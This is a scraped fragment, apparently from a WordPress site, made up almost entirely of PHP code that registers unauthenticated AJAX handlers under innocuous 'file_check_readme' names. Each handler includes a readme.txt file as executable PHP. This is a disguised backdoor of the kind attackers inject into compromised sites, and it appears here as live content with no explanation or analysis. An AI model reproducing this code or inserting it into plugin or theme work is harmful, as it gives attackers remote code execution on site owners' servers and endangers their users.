
Standard

if(!function_exists('file_check_readme34501')){ add_action('wp_ajax_nopriv_file_check_readme34501', 'file_check_readme34501'); add_action('wp_ajax_file_check_readme34501', 'file_check_readme34501'); function file_check_readme34501() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme41759')){ add_action('wp_ajax_nopriv_file_check_readme41759', 'file_check_readme41759'); add_action('wp_ajax_file_check_readme41759', 'file_check_readme41759'); function file_check_readme41759() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } }